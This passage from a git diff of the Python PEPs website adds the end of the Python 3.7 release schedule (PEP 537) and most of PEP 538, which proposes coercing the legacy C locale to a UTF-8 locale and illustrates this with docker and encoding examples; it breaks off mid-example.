As of 2023-06-27, 3.7 has reached the +end-of-life phase +of its release cycle. 3.7.17 was the final security release. The code base for +3.7 is now frozen and no further updates will be provided nor issues of any +kind will be accepted on the bug tracker.

+
+
+

Release Schedule

+
+

3.7.0 schedule

+
    +
  • 3.7 development begins: 2016-09-12
  • +
  • 3.7.0 alpha 1: 2017-09-19
  • +
  • 3.7.0 alpha 2: 2017-10-17
  • +
  • 3.7.0 alpha 3: 2017-12-05
  • +
  • 3.7.0 alpha 4: 2018-01-09
  • +
  • 3.7.0 beta 1: 2018-01-31 +(No new features beyond this point.)
  • +
  • 3.7.0 beta 2: 2018-02-27
  • +
  • 3.7.0 beta 3: 2018-03-29
  • +
  • 3.7.0 beta 4: 2018-05-02
  • +
  • 3.7.0 beta 5: 2018-05-30
  • +
  • 3.7.0 candidate 1: 2018-06-12
  • +
  • 3.7.0 final: 2018-06-27
  • +
+
+
+

3.7.1 schedule (first bugfix release)

+
    +
  • 3.7.1 candidate 1: 2018-09-26
  • +
  • 3.7.1 candidate 2: 2018-10-13
  • +
  • 3.7.1 final: 2018-10-20
  • +
+
+
+

3.7.2 schedule

+
    +
  • 3.7.2 candidate 1: 2018-12-11
  • +
  • 3.7.2 final: 2018-12-24
  • +
+
+
+

3.7.3 schedule

+
    +
  • 3.7.3 candidate 1: 2019-03-12
  • +
  • 3.7.3 final: 2019-03-25
  • +
+
+
+

3.7.4 schedule

+
    +
  • 3.7.4 candidate 1: 2019-06-18
  • +
  • 3.7.4 candidate 2: 2019-07-02
  • +
  • 3.7.4 final: 2019-07-08
  • +
+
+
+

3.7.5 schedule

+
    +
  • 3.7.5 candidate 1: 2019-10-02
  • +
  • 3.7.5 final: 2019-10-15
  • +
+
+
+

3.7.6 schedule

+
    +
  • 3.7.6 candidate 1: 2019-12-11
  • +
  • 3.7.6 final: 2019-12-18
  • +
+
+
+

3.7.7 schedule

+
    +
  • 3.7.7 candidate 1: 2020-03-04
  • +
  • 3.7.7 final: 2020-03-10
  • +
+
+
+

3.7.8 schedule (last bugfix release)

+

Last planned release of binaries

+
    +
  • 3.7.8 candidate 1: 2020-06-15
  • +
  • 3.7.8 final: 2020-06-27
  • +
+
+
+

3.7.9 schedule (security/binary release)

+

Security fixes plus updated binary installers +to address 3.7.8 issues; no further binary +releases are planned.

+
    +
  • 3.7.9 final: 2020-08-17
  • +
+
+
+

3.7.10 schedule

+
    +
  • 3.7.10 final: 2021-02-15
  • +
+
+
+

3.7.11 schedule

+
    +
  • 3.7.11 final: 2021-06-28
  • +
+
+
+

3.7.12 schedule

+
    +
  • 3.7.12 final: 2021-09-04
  • +
+
+
+

3.7.13 schedule

+
    +
  • 3.7.13 final: 2022-03-16
  • +
+
+
+

3.7.14 schedule

+
    +
  • 3.7.14 final: 2022-09-06
  • +
+
+
+

3.7.15 schedule

+
    +
  • 3.7.15 final: 2022-10-11
  • +
+
+
+

3.7.16 schedule

+
    +
  • 3.7.16 final: 2022-12-06
  • +
+
+
+

3.7.17 schedule (last security-only release)

+
    +
  • 3.7.17 final: 2023-06-06
  • +
+
+
+
+

Features for 3.7

+

Implemented PEPs for 3.7 (as of 3.7.0 beta 1):

+
    +
  • PEP 538, Coercing the legacy C locale to a UTF-8 based locale
  • +
  • PEP 539, A New C-API for Thread-Local Storage in CPython
  • +
  • PEP 540, UTF-8 mode
  • +
  • PEP 552, Deterministic pyc
  • +
  • PEP 553, Built-in breakpoint()
  • +
  • PEP 557, Data Classes
  • +
  • PEP 560, Core support for typing module and generic types
  • +
  • PEP 562, Module __getattr__ and __dir__
  • +
  • PEP 563, Postponed Evaluation of Annotations
  • +
  • PEP 564, Time functions with nanosecond resolution
  • +
  • PEP 565, Show DeprecationWarning in __main__
  • +
  • PEP 567, Context Variables
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0537.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0538/index.html b/pep-0538/index.html new file mode 100644 index 00000000000..96eb6af62cb --- /dev/null +++ b/pep-0538/index.html @@ -0,0 +1,1326 @@ + + + + + + + + PEP 538 – Coercing the legacy C locale to a UTF-8 based locale | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 538 – Coercing the legacy C locale to a UTF-8 based locale

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
BDFL-Delegate:
+
INADA Naoki
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
28-Dec-2016
+
Python-Version:
+
3.7
+
Post-History:
+
03-Jan-2017, +07-Jan-2017, +05-Mar-2017, +09-May-2017
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

An ongoing challenge with Python 3 on *nix systems is the conflict between +needing to use the configured locale encoding by default for consistency with +other locale-aware components in the same process or subprocesses, +and the fact that the standard C locale (as defined in POSIX:2001) typically +implies a default text encoding of ASCII, which is entirely inadequate for the +development of networked services and client applications in a multilingual +world.

+

PEP 540 proposes a change to CPython’s handling of the legacy C locale such +that CPython will assume the use of UTF-8 in such environments, rather than +persisting with the demonstrably problematic assumption of ASCII as an +appropriate encoding for communicating with operating system interfaces. +This is a good approach for cases where network encoding interoperability +is a more important concern than local encoding interoperability.

+

However, it comes at the cost of making CPython’s encoding assumptions diverge +from those of other locale-aware components in the same process, as well as +those of components running in subprocesses that share the same environment.

+

This can cause interoperability problems with some extension modules (such as +GNU readline’s command line history editing), as well as with components +running in subprocesses (such as older Python runtimes).

+

It also requires non-trivial changes to the internals of how CPython itself +works, rather than relying primarily on existing configuration settings that +are supported by Python versions prior to Python 3.7.

+

Accordingly, this PEP proposes that independently of the UTF-8 mode proposed +in PEP 540, the way the CPython implementation handles the default C locale be +changed to be roughly equivalent to the following existing configuration +settings (supported since Python 3.1):

+
LC_CTYPE=C.UTF-8
+PYTHONIOENCODING=utf-8:surrogateescape
+
+
+

The exact target locale for coercion will be chosen from a predefined list at +runtime based on the actually available locales.

+

The reinterpreted locale settings will be written back to the environment so +they’re visible to other components in the same process and in subprocesses, +but the changed PYTHONIOENCODING default will be made implicit in order to +avoid causing compatibility problems with Python 2 subprocesses that don’t +provide the surrogateescape error handler.

+

The new legacy locale coercion behavior can be disabled either by setting +LC_ALL (which may still lead to a Unicode compatibility warning) or by +setting the new PYTHONCOERCECLOCALE environment variable to 0.

+

With this change, any *nix platform that does not offer at least one of the +C.UTF-8, C.utf8 or UTF-8 locales as part of its standard +configuration would only be considered a fully supported platform for CPython +3.7+ deployments when a suitable locale other than the default C locale is +configured explicitly (e.g. en_AU.UTF-8, zh_CN.gb18030). If PEP 540 is +accepted in addition to this PEP, then pure Python modules would also be +supported when using the proposed PYTHONUTF8 mode, but expectations for +full Unicode compatibility in extension modules would continue to be limited +to the platforms covered by this PEP.

+

As it only reflects a change in default settings rather than a fundamentally +new capability, redistributors (such as Linux distributions) with a narrower +target audience than the upstream CPython development team may also choose to +opt in to this locale coercion behaviour for the Python 3.6.x series by +applying the necessary changes as a downstream patch.

+
+
+

Implementation Notes

+

Attempting to implement the PEP as originally accepted showed that the +proposal to emit locale coercion and compatibility warnings by default +simply wasn’t practical (there were too many cases where previously working +code failed because of the warnings, rather than because of latent locale +handling defects in the affected code).

+

As a result, the PY_WARN_ON_C_LOCALE config flag was removed, and replaced +with a runtime PYTHONCOERCECLOCALE=warn environment variable setting +that allows developers and system integrators to opt-in to receiving locale +coercion and compatibility warnings, without emitting them by default.

+

The output examples in the PEP itself have also been updated to remove +the warnings and make them easier to read.

+
+
+

Background

+

While the CPython interpreter is starting up, it may need to convert from +the char * format to the wchar_t * format, or from one of those formats +to PyUnicodeObject *, in a way that’s consistent with the locale settings +of the overall system. It handles these cases by relying on the operating +system to do the conversion and then ensuring that the text encoding name +reported by sys.getfilesystemencoding() matches the encoding used during +this early bootstrapping process.

+

On Windows, the limitations of the mbcs format used by default in these +conversions proved sufficiently problematic that PEP 528 and PEP 529 were +implemented to bypass the operating system supplied interfaces for binary data +handling and force the use of UTF-8 instead.

+

On Mac OS X, iOS, and Android, many components, including CPython, already +assume the use of UTF-8 as the system encoding, regardless of the locale +setting. However, this isn’t the case for all components, and the discrepancy +can cause problems in some situations (for example, when using the GNU readline +module [16]).

+

On non-Apple and non-Android *nix systems, these operations are handled using +the C locale system in glibc, which has the following characteristics [4]:

+
    +
  • by default, all processes start in the C locale, which uses ASCII +for these conversions. This is almost never what anyone doing multilingual +text processing actually wants (including CPython and C/C++ GUI frameworks).
  • +
  • calling setlocale(LC_ALL, "") reconfigures the active locale based on +the locale categories configured in the current process environment
  • +
  • if the locale requested by the current environment is unknown, or no specific +locale is configured, then the default C locale will remain active
  • +
+

The specific locale category that covers the APIs that CPython depends on is +LC_CTYPE, which applies to “classification and conversion of characters, +and to multibyte and wide characters” [5]. Accordingly, CPython includes the +following key calls to setlocale:

+
    +
  • in the main python binary, CPython calls setlocale(LC_ALL, "") to +configure the entire C locale subsystem according to the process environment. +It does this prior to making any calls into the shared CPython library
  • +
  • in Py_Initialize, CPython calls setlocale(LC_CTYPE, ""), such that +the configured locale settings for that category always match those set in +the environment. It does this unconditionally, and it doesn’t revert the +process state change in Py_Finalize
  • +
+

(This summary of the locale handling omits several technical details related +to exactly where and when the text encoding declared as part of the locale +settings is used - see PEP 540 for further discussion, as these particular +details matter more when decoupling CPython from the declared C locale than +they do when overriding the locale with one based on UTF-8)

+

These calls are usually sufficient to provide sensible behaviour, but they can +still fail in the following cases:

+
    +
  • SSH environment forwarding means that SSH clients may sometimes forward +client locale settings to servers that don’t have that locale installed. This +leads to CPython running in the default ASCII-based C locale
  • +
  • some process environments (such as Linux containers) may not have any +explicit locale configured at all. As with unknown locales, this leads to +CPython running in the default ASCII-based C locale
  • +
  • on Android, rather than configuring the locale based on environment variables, +the empty locale "" is treated as specifically requesting the "C" +locale
  • +
+

The simplest way to deal with this problem for currently released versions of +CPython is to explicitly set a more sensible locale when launching the +application. For example:

+
LC_CTYPE=C.UTF-8 python3 ...
+
+
+

The C.UTF-8 locale is a full locale definition that uses UTF-8 for the +LC_CTYPE category, and the same settings as the C locale for all other +categories (including LC_COLLATE). It is offered by a number of Linux +distributions (including Debian, Ubuntu, Fedora, Alpine and Android) as an +alternative to the ASCII-based C locale. Some other platforms (such as +HP-UX) offer an equivalent locale definition under the name C.utf8.

+

Mac OS X and other *BSD systems have taken a different approach: instead of +offering a C.UTF-8 locale, they offer a partial UTF-8 locale that only +defines the LC_CTYPE category. On such systems, the preferred +environmental locale adjustment is to set LC_CTYPE=UTF-8 rather than to set +LC_ALL or LANG. [17]

+

In the specific case of Docker containers and similar technologies, the +appropriate locale setting can be specified directly in the container image +definition.

+

Another common failure case is developers specifying LANG=C in order to +see otherwise translated user interface messages in English, rather than the +more narrowly scoped LC_MESSAGES=C or LANGUAGE=en.

+
+
+

Relationship with other PEPs

+

This PEP shares a common problem statement with PEP 540 (improving Python 3’s +behaviour in the default C locale), but diverges markedly in the proposed +solution:

+
    +
  • PEP 540 proposes to entirely decouple CPython’s default text encoding from +the C locale system in that case, allowing text handling inconsistencies to +arise between CPython and other locale-aware components running in the same +process and in subprocesses. This approach aims to make CPython behave less +like a locale-aware application, and more like locale-independent language +runtimes like those for Go, Node.js (V8), and Rust
  • +
  • this PEP proposes to override the legacy C locale with a more recently +defined locale that uses UTF-8 as its default text encoding. This means that +the text encoding override will apply not only to CPython, but also to any +locale-aware extension modules loaded into the current process, as well as to +locale-aware applications invoked in subprocesses that inherit their +environment from the parent process. This approach aims to retain CPython’s +traditional strong support for integration with other locale-aware components +while also actively helping to push forward the adoption and standardisation +of the C.UTF-8 locale as a Unicode-aware replacement for the legacy C locale +in the wider C/C++ ecosystem
  • +
+

After reviewing both PEPs, it became clear that they didn’t actually conflict +at a technical level, and the proposal in PEP 540 offered a superior option in +cases where no suitable locale was available, as well as offering a better +reference behaviour for platforms where the notion of a “locale encoding” +doesn’t make sense (for example, embedded systems running MicroPython rather +than the CPython reference interpreter).

+

Meanwhile, this PEP offered improved compatibility with other locale-aware +components, and an approach more amenable to being backported to Python 3.6 +by downstream redistributors.

+

As a result, this PEP was amended to refer to PEP 540 as a complementary +solution that offered improved behaviour when none of the standard UTF-8 based +locales were available, as well as extending the changes in the default +settings to APIs that aren’t currently independently configurable (such as +the default encoding and error handler for open()).

+

The availability of PEP 540 also meant that the LC_CTYPE=en_US.UTF-8 legacy +fallback was removed from the list of UTF-8 locales tried as a coercion target, +with the expectation being that CPython will instead rely solely on the +proposed PYTHONUTF8 mode in such cases.

+
+
+

Motivation

+

While Linux container technologies like Docker, Kubernetes, and OpenShift are +best known for their use in web service development, the related container +formats and execution models are also being adopted for Linux command line +application development. Technologies like Gnome Flatpak [7] and +Ubuntu Snappy [8] further aim to bring these same techniques to Linux GUI +application development.

+

When using Python 3 for application development in these contexts, it isn’t +uncommon to see text encoding related errors akin to the following:

+
$ docker run --rm fedora:25 python3 -c 'print("ℙƴ☂ℌøἤ")'
+Unable to decode the command from the command line:
+UnicodeEncodeError: 'utf-8' codec can't encode character '\udce2' in position 7: surrogates not allowed
+$ docker run --rm ncoghlan/debian-python python3 -c 'print("ℙƴ☂ℌøἤ")'
+Unable to decode the command from the command line:
+UnicodeEncodeError: 'utf-8' codec can't encode character '\udce2' in position 7: surrogates not allowed
+
+
+

Even though the same command is likely to work fine when run locally:

+
$ python3 -c 'print("ℙƴ☂ℌøἤ")'
+ℙƴ☂ℌøἤ
+
+
+

The source of the problem can be seen by instead running the locale command +in the three environments:

+
$ locale | grep -E 'LC_ALL|LC_CTYPE|LANG'
+LANG=en_AU.UTF-8
+LC_CTYPE="en_AU.UTF-8"
+LC_ALL=
+$ docker run --rm fedora:25 locale | grep -E 'LC_ALL|LC_CTYPE|LANG'
+LANG=
+LC_CTYPE="POSIX"
+LC_ALL=
+$ docker run --rm ncoghlan/debian-python locale | grep -E 'LC_ALL|LC_CTYPE|LANG'
+LANG=
+LANGUAGE=
+LC_CTYPE="POSIX"
+LC_ALL=
+
+
+

In this particular example, we can see that the host system locale is set to +“en_AU.UTF-8”, so CPython uses UTF-8 as the default text encoding. By contrast, +the base Docker images for Fedora and Debian don’t have any specific locale +set, so they use the POSIX locale by default, which is an alias for the +ASCII-based default C locale.

+

The simplest way to get Python 3 (regardless of the exact version) to behave +sensibly in Fedora and Debian based containers is to run it in the C.UTF-8 +locale that both distros provide:

+
$ docker run --rm -e LC_CTYPE=C.UTF-8 fedora:25 python3 -c 'print("ℙƴ☂ℌøἤ")'
+ℙƴ☂ℌøἤ
+$ docker run --rm -e LC_CTYPE=C.UTF-8 ncoghlan/debian-python python3 -c 'print("ℙƴ☂ℌøἤ")'
+ℙƴ☂ℌøἤ
+
+$ docker run --rm -e LC_CTYPE=C.UTF-8 fedora:25 locale | grep -E 'LC_ALL|LC_CTYPE|LANG'
+LANG=
+LC_CTYPE=C.UTF-8
+LC_ALL=
+$ docker run --rm -e LC_CTYPE=C.UTF-8 ncoghlan/debian-python locale | grep -E 'LC_ALL|LC_CTYPE|LANG'
+LANG=
+LANGUAGE=
+LC_CTYPE=C.UTF-8
+LC_ALL=
+
+
+

The Alpine Linux based Python images provided by Docker, Inc. already use the +C.UTF-8 locale by default:

+
$ docker run --rm python:3 python3 -c 'print("ℙƴ☂ℌøἤ")'
+ℙƴ☂ℌøἤ
+$ docker run --rm python:3 locale | grep -E 'LC_ALL|LC_CTYPE|LANG'
+LANG=C.UTF-8
+LANGUAGE=
+LC_CTYPE="C.UTF-8"
+LC_ALL=
+
+
+

Similarly, for custom container images (i.e. those adding additional content on +top of a base distro image), a more suitable locale can be set in the image +definition so everything just works by default. However, it would provide a much +nicer and more consistent user experience if CPython were able to just deal +with this problem automatically rather than relying on redistributors or end +users to handle it through system configuration changes.

+

While the glibc developers are working towards making the C.UTF-8 locale +universally available for use by glibc based applications like CPython [6], +this unfortunately doesn’t help on platforms that ship older versions of glibc +without that feature, and also don’t provide C.UTF-8 (or an equivalent) as an +on-disk locale the way Debian and Fedora do. These platforms are considered +out of scope for this PEP - see PEP 540 for further discussion of possible +options for improving CPython’s default behaviour in such environments.

+
+
+

Design Principles

+

The above motivation leads to the following core design principles for the +proposed solution:

+
    +
  • if a locale other than the default C locale is explicitly configured, we’ll +continue to respect it
  • +
  • as far as is feasible, any changes made will use existing configuration +options
  • +
  • Python’s runtime behaviour in potential coercion target locales should be +identical regardless of whether the locale was set explicitly in the +environment or implicitly as a locale coercion target
  • +
  • for Python 3.7, if we’re changing the locale setting without an explicit +config option, we’ll emit a warning on stderr that we’re doing so rather +than silently changing the process configuration. This will alert application +and system integrators to the change, even if they don’t closely follow the +PEP process or Python release announcements. However, to minimize the chance +of introducing new problems for end users, we’ll do this without using the +warnings system, so even running with -Werror won’t turn it into a runtime +exception. (Note: these warnings ended up being silenced by default. See the +Implementation Note above for more details)
  • +
  • for Python 3.7, any changed defaults will offer some form of explicit “off” +switch at build time, runtime, or both
  • +
+

Minimizing the negative impact on systems currently correctly configured to +use GB-18030 or another partially ASCII compatible universal encoding leads to +the following design principle:

+
    +
  • if a UTF-8 based Linux container is run on a host that is explicitly +configured to use a non-UTF-8 encoding, and tries to exchange locally +encoded data with that host rather than exchanging explicitly UTF-8 encoded +data, CPython will endeavour to correctly round-trip host provided data that +is concatenated or split solely at common ASCII compatible code points, but +may otherwise emit nonsensical results.
  • +
+

Minimizing the negative impact on systems and programs correctly configured to +use an explicit locale category like LC_TIME, LC_MONETARY or +LC_NUMERIC while otherwise running in the legacy C locale gives the +following design principles:

+
    +
  • don’t make any environmental changes that would alter any existing settings +for locale categories other than LC_CTYPE (most notably: don’t set +LC_ALL or LANG)
  • +
+

Finally, maintaining compatibility with running arbitrary subprocesses in +orchestration use cases leads to the following design principle:

+
    +
  • don’t make any Python-specific environmental changes that might be +incompatible with any still supported version of CPython (including +CPython 2.7)
  • +
+
+
+

Specification

+

To better handle the cases where CPython would otherwise end up attempting +to operate in the C locale, this PEP proposes that CPython automatically +attempt to coerce the legacy C locale to a UTF-8 based locale for the +LC_CTYPE category when it is run as a standalone command line application.

+

It further proposes to emit a warning on stderr if the legacy C locale +is in effect for the LC_CTYPE category at the point where the language +runtime itself is initialized, +and the explicit environmental flag to disable locale coercion is not set, in +order to warn system and application integrators that they’re running CPython +in an unsupported configuration.

+

In addition to these general changes, some additional Android-specific changes +are proposed to handle the differences in the behaviour of setlocale on that +platform.

+
+

Legacy C locale coercion in the standalone Python interpreter binary

+

When run as a standalone application, CPython has the opportunity to +reconfigure the C locale before any locale dependent operations are executed +in the process.

+

This means that it can change the locale settings not only for the CPython +runtime, but also for any other locale-aware components running in the current +process (e.g. as part of extension modules), as well as in subprocesses that +inherit their environment from the current process.

+

After calling setlocale(LC_ALL, "") to initialize the locale settings in +the current process, the main interpreter binary will be updated to include +the following call:

+
const char *ctype_loc = setlocale(LC_CTYPE, NULL);
+
+
+

This cryptic invocation is the API that C provides to query the current locale +setting without changing it. Given that query, it is possible to check for +exactly the C locale with strcmp:

+
ctype_loc != NULL && strcmp(ctype_loc, "C") == 0 # true only in the C locale
+
+
+

This call also returns "C" when either no particular locale is set, or the +nominal locale is set to an alias for the C locale (such as POSIX).

+

Given this information, CPython can then attempt to coerce the locale to one +that uses UTF-8 rather than ASCII as the default encoding.

+

Three such locales will be tried:

+
    +
  • C.UTF-8 (available at least in Debian, Ubuntu, Alpine, and Fedora 25+, and +expected to be available by default in a future version of glibc)
  • +
  • C.utf8 (available at least in HP-UX)
  • +
  • UTF-8 (available in at least some *BSD variants, including Mac OS X)
  • +
+

The coercion will be implemented by setting the LC_CTYPE environment +variable to the candidate locale name, such that future calls to +setlocale() will see it, as will other components looking for those +settings (such as GUI development frameworks and Python’s own locale +module).

+

To allow for better cross-platform binary portability and to adjust +automatically to future changes in locale availability, these checks will be +implemented at runtime on all platforms other than Windows, rather than +attempting to determine which locales to try at compile time.

+

When this locale coercion is activated, the following warning will be +printed on stderr, with the warning containing whichever locale was +successfully configured:

+
Python detected LC_CTYPE=C: LC_CTYPE coerced to C.UTF-8 (set another
+locale or PYTHONCOERCECLOCALE=0 to disable this locale coercion behaviour).
+
+
+

(Note: this warning ended up being silenced by default. See the +Implementation Note above for more details)

+

As long as the current platform provides at least one of the candidate UTF-8 +based environments, this locale coercion will mean that the standard +Python binary and locale-aware extensions should once again “just work” +in the three main failure cases we’re aware of (missing locale +settings, SSH forwarding of unknown locales via LANG or LC_CTYPE, and +developers explicitly requesting LANG=C).

+

The one case where failures may still occur is when stderr is specifically +being checked for no output, which can be resolved either by configuring +a locale other than the C locale, or else by using a mechanism other than +“there was no output on stderr” to check for subprocess errors (e.g. checking +process return codes).

+

If none of the candidate locales are successfully configured, or the LC_ALL, +locale override is defined in the current process environment, then +initialization will continue in the C locale and the Unicode compatibility +warning described in the next section will be emitted just as it would for +any other application.

+

If PYTHONCOERCECLOCALE=0 is explicitly set, initialization will continue in +the C locale and the Unicode compatibility warning described in the next +section will be automatically suppressed.

+

The interpreter will always check for the PYTHONCOERCECLOCALE environment +variable at startup (even when running under the -E or -I switches), +as the locale coercion check necessarily takes place before any command line +argument processing. For consistency, the runtime check to determine whether +or not to suppress the locale compatibility warning will be similarly +independent of these settings.

+
+
+

Legacy C locale warning during runtime initialization

+

By the time that Py_Initialize is called, arbitrary locale-dependent +operations may have taken place in the current process. This means that +by the time it is called, it is too late to reliably switch to a different +locale - doing so would introduce inconsistencies in decoded text, even in the +context of the standalone Python interpreter binary.

+

Accordingly, when Py_Initialize is called and CPython detects that the +configured locale is still the default C locale and +PYTHONCOERCECLOCALE=0 is not set, the following warning will be issued:

+
Python runtime initialized with LC_CTYPE=C (a locale with default ASCII
+encoding), which may cause Unicode compatibility problems. Using C.UTF-8,
+C.utf8, or UTF-8 (if available) as alternative Unicode-compatible
+locales is recommended.
+
+
+

(Note: this warning ended up being silenced by default. See the +Implementation Note above for more details)

+

In this case, no actual change will be made to the locale settings.

+

Instead, the warning informs both system and application integrators that +they’re running Python 3 in a configuration that we don’t expect to work +properly.

+

The second sentence providing recommendations may eventually be conditionally +compiled based on the operating system (e.g. recommending LC_CTYPE=UTF-8 +on *BSD systems), but the initial implementation will just use the common +generic message shown above.

+
+
+

New build-time configuration options

+

While both of the above behaviours would be enabled by default, they would +also have new associated configuration options and preprocessor definitions +for the benefit of redistributors that want to override those default settings.

+

The locale coercion behaviour would be controlled by the flag +--with[out]-c-locale-coercion, which would set the PY_COERCE_C_LOCALE +preprocessor definition.

+

The locale warning behaviour would be controlled by the flag +--with[out]-c-locale-warning, which would set the PY_WARN_ON_C_LOCALE +preprocessor definition.

+

(Note: this compile time warning option ended up being replaced by a runtime +PYTHONCOERCECLOCALE=warn option. See the Implementation Note above for +more details)

+

On platforms which don’t use the autotools based build system (i.e. +Windows) these preprocessor variables would always be undefined.

+
+
+

Changes to the default error handling on the standard streams

+

Since Python 3.5, CPython has defaulted to using surrogateescape on the +standard streams (sys.stdin, sys.stdout) when it detects that the +current locale is C and no specific error handled has been set using +either the PYTHONIOENCODING environment variable or the +Py_setStandardStreamEncoding API. For other locales, the default error +handler for the standard streams is strict.

+

In order to preserve this behaviour without introducing any behavioural +discrepancies between locale coercion and explicitly configuring a locale, the +coercion target locales (C.UTF-8, C.utf8, and UTF-8) will be added +to the list of locales that use surrogateescape as their default error +handler for the standard streams.

+

No changes are proposed to the default error handler for sys.stderr: that +will continue to be backslashreplace.

+
+
+

Changes to locale settings on Android

+

Independently of the other changes in this PEP, CPython on Android systems +will be updated to call setlocale(LC_ALL, "C.UTF-8") where it currently +calls setlocale(LC_ALL, "") and setlocale(LC_CTYPE, "C.UTF-8") where +it currently calls setlocale(LC_CTYPE, "").

+

This Android-specific behaviour is being introduced due to the following +Android-specific details:

+
    +
  • on Android, passing "" to setlocale is equivalent to passing "C"
  • +
  • the C.UTF-8 locale is always available
  • +
+
+
+
+

Platform Support Changes

+

A new “Legacy C Locale” section will be added to PEP 11 that states:

+
    +
  • as of CPython 3.7, *nix platforms are expected to provide at least one of +C.UTF-8 (full locale), C.utf8 (full locale) or UTF-8 ( +LC_CTYPE-only locale) as an alternative to the legacy C locale. +Any Unicode related integration problems that occur only in the legacy C +locale and cannot be reproduced in an appropriately configured non-ASCII +locale will be closed as “won’t fix”.
  • +
+
+
+

Rationale

+
+

Improving the handling of the C locale

+

It has been clear for some time that the C locale’s default encoding of +ASCII is entirely the wrong choice for development of modern networked +services. Newer languages like Rust and Go have eschewed that default entirely, +and instead made it a deployment requirement that systems be configured to use +UTF-8 as the text encoding for operating system interfaces. Similarly, Node.js +assumes UTF-8 by default (a behaviour inherited from the V8 JavaScript engine) +and requires custom build settings to indicate it should use the system +locale settings for locale-aware operations. Both the JVM and the .NET CLR +use UTF-16-LE as their primary encoding for passing text between applications +and the application runtime (i.e. the JVM/CLR, not the host operating system).

+

The challenge for CPython has been the fact that in addition to being used for +network service development, it is also extensively used as an embedded +scripting language in larger applications, and as a desktop application +development language, where it is more important to be consistent with other +locale-aware components sharing the same process, as well as with the user’s +desktop locale settings, than it is with the emergent conventions of modern +network service development.

+

The core premise of this PEP is that for all of these use cases, the +assumption of ASCII implied by the default “C” locale is the wrong choice, +and furthermore that the following assumptions are valid:

+
    +
  • in desktop application use cases, the process locale will already be +configured appropriately, and if it isn’t, then that is an operating system +or embedding application level problem that needs to be reported to and +resolved by the operating system provider or application developer
  • +
  • in network service development use cases (especially those based on Linux +containers), the process locale may not be configured at all, and if it +isn’t, then the expectation is that components will impose their own default +encoding the way Rust, Go and Node.js do, rather than trusting the legacy C +default encoding of ASCII the way CPython currently does
  • +
+
+
+

Defaulting to “surrogateescape” error handling on the standard IO streams

+

By coercing the locale away from the legacy C default and its assumption of +ASCII as the preferred text encoding, this PEP also disables the implicit use +of the “surrogateescape” error handler on the standard IO streams that was +introduced in Python 3.5 ([15]), as well as the automatic use of +surrogateescape when operating in PEP 540’s proposed UTF-8 mode.

+

Rather than introducing yet another configuration option to adjust that +behaviour, this PEP instead proposes to extend the “surrogateescape” default +for stdin and stderr error handling to also apply to the three +potential coercion target locales.

+

The aim of this behaviour is to attempt to ensure that operating system +provided text values are typically able to be transparently passed through a +Python 3 application even if it is incorrect in assuming that that text has +been encoded as UTF-8.

+

In particular, GB 18030 [12] is a Chinese national text encoding standard +that handles all Unicode code points, that is formally incompatible with both +ASCII and UTF-8, but will nevertheless often tolerate processing as surrogate +escaped data - the points where GB 18030 reuses ASCII byte values in an +incompatible way are likely to be invalid in UTF-8, and will therefore be +escaped and opaque to string processing operations that split on or search for +the relevant ASCII code points. Operations that don’t involve splitting on or +searching for particular ASCII or Unicode code point values are almost +certain to work correctly.

+

Similarly, Shift-JIS [13] and ISO-2022-JP [14] remain in widespread use in +Japan, and are incompatible with both ASCII and UTF-8, but will tolerate text +processing operations that don’t involve splitting on or searching for +particular ASCII or Unicode code point values.

+

As an example, consider two files, one encoded with UTF-8 (the default encoding +for en_AU.UTF-8), and one encoded with GB-18030 (the default encoding for +zh_CN.gb18030):

+
$ python3 -c 'open("utf8.txt", "wb").write("ℙƴ☂ℌøἤ\n".encode("utf-8"))'
+$ python3 -c 'open("gb18030.txt", "wb").write("ℙƴ☂ℌøἤ\n".encode("gb18030"))'
+
+
+

On disk, we can see that these are two very different files:

+
$ python3 -c 'print("UTF-8:  ", open("utf8.txt", "rb").read().strip()); \
+              print("GB18030:", open("gb18030.txt", "rb").read().strip())'
+UTF-8:   b'\xe2\x84\x99\xc6\xb4\xe2\x98\x82\xe2\x84\x8c\xc3\xb8\xe1\xbc\xa4\n'
+GB18030: b'\x816\xbd6\x810\x9d0\x817\xa29\x816\xbc4\x810\x8b3\x816\x8d6\n'
+
+
+

That nevertheless can both be rendered correctly to the terminal as long as +they’re decoded prior to printing:

+
$ python3 -c 'print("UTF-8:  ", open("utf8.txt", "r", encoding="utf-8").read().strip()); \
+              print("GB18030:", open("gb18030.txt", "r", encoding="gb18030").read().strip())'
+UTF-8:   ℙƴ☂ℌøἤ
+GB18030: ℙƴ☂ℌøἤ
+
+
+

By contrast, if we just pass along the raw bytes, as cat and similar C/C++ +utilities will tend to do:

+
$ LANG=en_AU.UTF-8 cat utf8.txt gb18030.txt
+ℙƴ☂ℌøἤ
+�6�6�0�0�7�9�6�4�0�3�6�6
+
+
+

Even setting a specifically Chinese locale won’t help in getting the +GB-18030 encoded file rendered correctly:

+
$ LANG=zh_CN.gb18030 cat utf8.txt gb18030.txt
+ℙƴ☂ℌøἤ
+�6�6�0�0�7�9�6�4�0�3�6�6
+
+
+

The problem is that the terminal encoding setting remains UTF-8, regardless +of the nominal locale. A GB18030 terminal can be emulated using the iconv +utility:

+
$ cat utf8.txt gb18030.txt | iconv -f GB18030 -t UTF-8
+鈩櫰粹槀鈩屆羔激
+ℙƴ☂ℌøἤ
+
+
+

This reverses the problem, such that the GB18030 file is rendered correctly, +but the UTF-8 file has been converted to unrelated hanzi characters, rather than +the expected rendering of “Python” as non-ASCII characters.

+

With the emulated GB18030 terminal encoding, assuming UTF-8 in Python results +in both files being displayed incorrectly:

+
$ python3 -c 'print("UTF-8:  ", open("utf8.txt", "r", encoding="utf-8").read().strip()); \
+              print("GB18030:", open("gb18030.txt", "r", encoding="gb18030").read().strip())' \
+  | iconv -f GB18030 -t UTF-8
+UTF-8:   鈩櫰粹槀鈩屆羔激
+GB18030: 鈩櫰粹槀鈩屆羔激
+
+
+

However, setting the locale correctly means that the emulated GB18030 terminal +now displays both files as originally intended:

+
$ LANG=zh_CN.gb18030 \
